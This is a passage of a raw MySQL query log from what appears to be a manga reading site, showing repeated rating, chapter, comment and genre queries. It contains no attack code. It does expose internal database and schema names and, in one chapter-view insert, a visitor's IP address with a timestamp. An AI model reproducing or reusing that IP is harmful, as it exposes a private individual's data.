330646849 Quit 330646850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330646850 Quit 330646851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330646851 Quit 330646852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330646852 Quit 330646853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330646853 Quit 330646854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330646854 Quit 330646855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330646855 Quit 330646856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330646856 Quit 330646857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330646857 Quit 330646858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330646858 Quit 330646859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330646859 Quit 330646860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330646860 Quit 330646861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330646861 Quit 330646862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330646862 Quit 330646863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330646863 Quit 330646864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330646864 Quit 330646865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330646865 Quit 330646866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330646866 Quit 330646867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330646867 Quit 330646868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330646868 Quit 330646869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330646869 Quit 330646870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330646870 Quit 330646871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330646871 Quit 330646872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330646872 Quit 330646873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330646873 Quit 330646874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330646874 Quit 330646875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330646875 Quit 330646876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330646876 Quit 330646877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330646877 Quit 330646878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330646878 Quit 330646879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330646879 Quit 330646880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330646880 Quit 330646881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330646881 Quit 330646882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330646882 Quit 330646883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330646883 Quit 330646884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330646884 Quit 330646885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330646885 Quit 330646886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330646886 Quit 330646887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330646887 Quit 330646888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330646888 Quit 330646889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330646889 Quit 330646890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330646890 Quit 330646891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330646891 Quit 330646892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330646892 Quit 330646893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330646893 Quit 330646894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330646894 Quit 330646895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330646895 Quit 330646896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330646896 Quit 330646897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330646897 Quit 330646898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330646898 Quit 330646899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330646899 Quit 330646900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330646900 Quit 330646901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330646901 Quit 330646902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330646902 Quit 330646903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330646903 Quit 330646904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330646904 Quit 330646905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330646905 Quit 330646906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330646906 Quit 330646907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330646907 Quit 330646908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330646908 Quit 330646909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330646909 Quit 330646910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330646910 Quit 330646911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330646911 Quit 330646912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330646912 Quit 330646913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330646913 Quit 330646914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330646914 Quit 330646915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330646915 Quit 330646916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330646916 Quit 330646917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330646917 Quit 330646918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330646918 Quit 330646919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330646919 Quit 330646920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330646920 Quit 330646921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330646921 Quit 330646922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330646922 Quit 330646923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330646923 Quit 330646924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330646924 Quit 330646925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330646925 Quit 330646926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330646926 Quit 330646927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330646927 Quit 330646928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330646928 Quit 330646929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330646929 Quit 330646930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330646930 Quit 330646931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330646931 Quit 330646932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330646932 Quit 330646933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330646933 Quit 330646934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330646934 Quit 330646935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330646935 Quit 330646936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330646936 Quit 330646937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330646937 Quit 330646938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330646938 Quit 330646939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330646939 Quit 330646940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330646940 Quit 330646941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330646941 Quit 330646942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330646942 Quit 330646943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330646943 Quit 330646944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330646944 Quit 330646945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330646945 Quit 330646946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330646946 Quit 330646947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330646947 Quit 330646948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330646948 Quit 330646949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330646949 Quit 330646950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330646950 Quit 330646951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330646951 Quit 330646952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330646952 Quit 330646953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330646953 Quit 330646954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646954 Quit 330646955 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646955 Quit 330646956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646956 Quit 330646957 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3495' 330646957 Quit 330646958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646958 Query select * FROM chapters where id = '3495' 330646958 Quit 330646959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646959 Query select * FROM chapters where manga_id = '80' order by id desc 330646453 Quit 330646960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646960 Query select * FROM comments where manga_id = '206' and parent_id is null order by created desc 330646960 Quit 330646961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646961 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '206' and m.active = 1 330646961 Quit 330646962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646962 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Comedy%' OR m.genres like '%Drama%' OR m.genres like '%Mystery%' OR m.genres like '%Psychological%' OR m.genres like '%Romance%' OR m.genres like '%School%' OR m.genres like '%Seinen%') group by manga_id ORDER BY sum(view) DESC 330646959 Quit 330646963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646963 Query Update chapters set view=view+1 where id = '3495' 330646963 Quit 330646964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646964 Query select * FROM chapters where id = '3495' 330646965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646964 Quit 330646965 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3495' 330646965 Quit 330646966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646966 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('80', '3495', '109.206.207.116', 'mangacherri.com', '2026-02-26 03:28:46', '2026-02-26 03:28:46') 330646966 Quit 330646967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646967 Query select * FROM chapter_images where chapter_id = '3495' 330646967 Quit 330646968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646968 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '80' and m.active = 1 330646968 Quit 330646969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646969 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='80' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 260225 19:28:47 330646962 Quit 330646970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646970 Quit 330646971 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646971 Quit 330646972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330646972 Quit 330646973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646973 Query select * FROM chapters where manga_id = '206' order by created desc limit 1 330646973 Quit 330646974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646974 Query select * FROM comments where parent_id = '1203' 330646974 Quit 330646975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646975 Query select * FROM comments where parent_id = '967' 330646975 Quit 330646976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646976 Query select * FROM comments where parent_id = '954' 330646976 Quit 330646977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646977 Query select * FROM comments where parent_id = '838' 330646977 Quit 330646978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646978 Query select * FROM comments where parent_id = '784' 330646978 Quit 330646979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646979 Query select * FROM comments where parent_id = '783' 330646979 Quit 330646980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646980 Query select * FROM comments where parent_id = '778' 330646980 Quit 330646981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646981 Query select * FROM comments where parent_id = '777' 330646981 Quit 330646982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646982 Query select * FROM comments where parent_id = '754' 330646982 Quit 330646983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646983 Query select * FROM comments where parent_id = '747' 330646983 Quit 330646984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646984 Query select * FROM comments where parent_id = '731' 330646984 Quit 330646985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646985 Query select * FROM comments where parent_id = '725' 330646985 Quit 330646986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646986 Query select * FROM comments where parent_id = '718' 330646986 Quit 330646987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646987 Query select * FROM comments where parent_id = '707' 330646987 Quit 330646988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646988 Query select * FROM comments where parent_id = '706' 330646988 Quit 330646989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646989 Query select * FROM comments where parent_id = '705' 330646989 Quit 330646990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646990 Query select * FROM comments where parent_id = '699' 330646990 Quit 330646991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646991 Query select * FROM comments where parent_id = '698' 330646991 Quit 330646992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646992 Query select * FROM comments where parent_id = '697' 330646992 Quit 330646993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646993 Query select * FROM comments where parent_id = '691' 330646993 Quit 330646994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330646994 Quit 330646995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330646995 Quit 330646996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330646996 Quit 330646997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330646997 Quit 330646998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330646998 Quit 330646999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330646999 Quit 330647000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330647000 Quit 330647001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330647001 Quit 330647002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330647002 Quit 330647003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330647003 Quit 330647004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330647004 Quit 330647005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330647005 Quit 330647006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330647006 Quit 330647007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330647007 Quit 330647008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330647008 Quit 330647009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647009 Query select count(id) as total_rating, 